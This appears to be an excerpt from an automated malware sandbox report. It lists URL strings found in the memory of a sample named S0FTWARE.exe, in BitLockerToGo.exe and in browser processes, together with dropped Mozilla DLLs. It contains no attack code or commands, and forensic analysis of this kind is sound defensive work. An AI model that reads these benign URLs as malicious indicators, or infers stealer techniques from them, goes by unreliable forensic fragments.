                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2673667387.0000000003311000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2673667387.0000000003311000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2673667387.0000000003311000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: S0FTWARE.exeString found in binary or memory: http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.htmlreflect:
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                          Source: chrome.exe, 00000007.00000003.2113134041.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113553954.00002FC000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113644932.00002FC001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113484219.00002FC00102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                          Source: S0FTWARE.exeString found in binary or memory: http://madskills.com/public/xml/rss/module/trackback/reflect.Value.Slice:
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2673667387.0000000003311000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: chrome.exe, 00000007.00000003.2115027855.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115064466.00002FC000790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113134041.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113553954.00002FC000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115154105.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113523999.00002FC00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113644932.00002FC001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115191569.00002FC000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113484219.00002FC00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                          Source: chrome.exe, 00000007.00000003.2115027855.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115064466.00002FC000790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113134041.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113553954.00002FC000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115154105.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113523999.00002FC00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113644932.00002FC001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115191569.00002FC000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113484219.00002FC00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                          Source: chrome.exe, 00000007.00000003.2115027855.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115064466.00002FC000790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113134041.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113553954.00002FC000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115154105.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113523999.00002FC00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113644932.00002FC001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115191569.00002FC000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113484219.00002FC00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                          Source: chrome.exe, 00000007.00000003.2115027855.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115064466.00002FC000790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113134041.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113553954.00002FC000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115154105.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113523999.00002FC00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113644932.00002FC001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115191569.00002FC000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113484219.00002FC00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                          Source: S0FTWARE.exeString found in binary or memory: http://postneo.com/icbm/idna:
                          Source: S0FTWARE.exeString found in binary or memory: http://web.resource.org/cc/insufficient
                          Source: S0FTWARE.exeString found in binary or memory: http://webns.net/mvcb/idna:
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2673667387.0000000003311000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: S0FTWARE.exeString found in binary or memory: http://www.opengis.net/gmlhttp://xmlns.com/foaf/0.1/initSpan:
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680954869.000000001B64D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, KFIJEG.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: chrome.exe, 00000007.00000003.2113743139.00002FC000FBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                          Source: chrome.exe, 00000007.00000003.2113743139.00002FC000FBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                          Source: chrome.exe, 00000007.00000003.2113743139.00002FC000FBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                          Source: chrome.exe, 00000007.00000003.2113743139.00002FC000FBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin/
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
